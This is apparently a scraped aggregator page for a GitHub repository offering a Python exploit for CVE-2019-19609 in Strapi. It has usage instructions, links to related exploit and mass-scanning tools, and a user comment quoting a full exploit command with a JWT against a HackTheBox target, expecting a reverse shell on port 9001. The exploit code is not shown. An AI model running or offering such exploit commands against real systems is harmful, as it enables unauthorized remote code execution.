Strapi Framework Vulnerable to Remote Code Execution

Dasith Vidanage

Last update: Mar 8, 2022

Related tags

Security related resources CVE-2019-19609

Overview

CVE-2019-19609

Strapi Framework Vulnerable to Remote Code Execution

well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/

Usage


python3 exploit.py <rhost> <lhost> <jwt> <url>

A video

https://youtu.be/alhZJmuUd2s

More Information

https://hack-fast.herokuapp.com/cve/CVE-2019-19609
https://github.com/strapi/strapi/pull/4636

You might also like...

On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 4, 2022

SonicWALL SSL-VPN Web Server Vulnerable Exploit

44 Nov 15, 2022

adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

136 Jan 2, 2023

OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa

13 Jul 13, 2022

Proof of concept to check if hosts are vulnerable to CVE-2021-41773

CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV

43 Nov 9, 2022

OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

560 Dec 23, 2022

Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

6 Dec 28, 2022

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

431 Dec 22, 2022

Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

8 Feb 27, 2022

Comments

No shell to listener

Hi,

so I am using the exploit on a hackthebox machine. When executing the script, this is shown:

Strapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609 please set up a listener on port 9001 before running the script. you will get a shell to that listener

Traceback (most recent call last): File "/home/oceanhawk/CVE/CVE-2019-19609/exploit.py", line 30, in response = requests.post(url, headers=headers, data=data, verify=False) File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 119, in post return request('post', url, data=data, json=json, **kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, **kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 530, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in send history = [resp for resp in gen] File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 665, in history = [resp for resp in gen] File "/usr/local/lib/python3.9/dist-packages/requests/sessions.py", line 166, in resolve_redirects raise TooManyRedirects('Exceeded {} redirects.'.format(self.max_redirects), response=resp) requests.exceptions.TooManyRedirects: Exceeded 30 redirects.

I get no shell to my listener on 9001.

The command I type is this:

python3 exploit.py api-prod.horizontal.htb lhost eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM0NjUxMTc5LCJleHAiOjE2MzcyNDMxNzl9.h_EP9dFh_0qAIZU3lvl1SpVkkYlBY_nN45BGQ7ptIqw http://api-prod.horizontall.htb/

opened by oceanhawk 3

Strapi Framework Vulnerable to Remote Code Execution

Related tags

Overview

CVE-2019-19609

Usage

A video

More Information

You might also like...

On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

SonicWALL SSL-VPN Web Server Vulnerable Exploit

adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

Proof of concept to check if hosts are vulnerable to CVE-2021-41773

OpenSource Poc && Vulnerable-Target Storage Box.

Mass Check Vulnerable Log4j CVE-2021-44228

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Comments

No shell to listener

Owner

Dasith Vidanage

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2021-26084 Remote Code Execution on Confluence Servers

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

Übersicht remote command execution 0day exploit